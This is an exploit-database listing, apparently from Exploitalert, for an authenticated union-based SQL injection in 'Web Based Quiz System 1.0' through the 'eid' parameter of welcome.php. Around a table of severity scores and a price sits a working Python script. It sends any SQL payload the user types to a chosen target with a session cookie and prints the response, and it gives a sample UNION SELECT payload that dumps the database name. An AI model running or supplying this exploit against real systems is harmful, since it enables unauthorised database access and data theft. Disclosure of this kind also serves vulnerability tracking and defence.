Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-03-07 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L | 0.02192 | 0.50148 |
''' # Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) # Date: 04-03-2021 # Exploit Author: Deepak Kumar Bharti # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System PoC made in python by Nano ''' import requests, sys def main(): print("U Need to Set PHPSESSID Before u Continue EDIT CODE") siteinput = input('site: ') ## Takes users input req = requests.get(f"{siteinput}/welcome.php") ''' Checks if File is there ''' if req.status_code == 200: pass # Might be Vuln else: print("NOT VULN") sys.exit() # not Vuln while True: print("Example Payloads: Union Select 1,database(),database(),4,5-- -") sql = input('SQLPAYLOADS: ') # Sets the Auth Cookie cookies = { "PHPSESSID": "" } # Shit for logs header = { "upgrade-insecure-requests": "1", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36" } req1 = requests.get(f"{siteinput}/welcome.php?q=quiz&step=2&eid=60377db362694' {sql}&n=2&t=34", cookies=cookies, headers=header) print(req1.text) main()
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.